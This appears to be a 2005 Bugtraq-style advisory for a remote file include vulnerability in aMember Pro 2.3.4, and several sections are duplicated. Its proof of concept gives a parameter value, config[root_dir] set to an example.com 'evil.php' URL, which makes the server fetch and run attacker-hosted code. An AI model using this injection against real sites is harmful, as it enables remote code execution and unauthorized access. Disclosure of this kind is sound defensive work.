AMember Remote File Include Vulnerability
BID:14777
Info
AMember Remote File Include Vulnerability
| Bugtraq ID: | 14777 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 08 2005 12:00AM |
| Updated: | Sep 08 2005 12:00AM |
| Credit: | NewAngels Team is credited with the discovery of this vulnerability. |
| Vulnerable: |
CGI Central aMember Pro 2.3.4 |
| Not Vulnerable: | |
Discussion
AMember Remote File Include Vulnerability
aMember is prone to a remote file include vulnerability.
Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.
This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable.
aMember is prone to a remote file include vulnerability.
Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.
This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable.
Exploit / POC
AMember Remote File Include Vulnerability
An exploit is not required.
The following proof of concept is available:
config[root_dir]=http://example.com/evil.php?
An exploit is not required.
The following proof of concept is available:
config[root_dir]=http://example.com/evil.php?
Solution / Fix
AMember Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
AMember Remote File Include Vulnerability
References:
References:
- [NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability (NewAngels)
- AMember Home Page (CGI Central)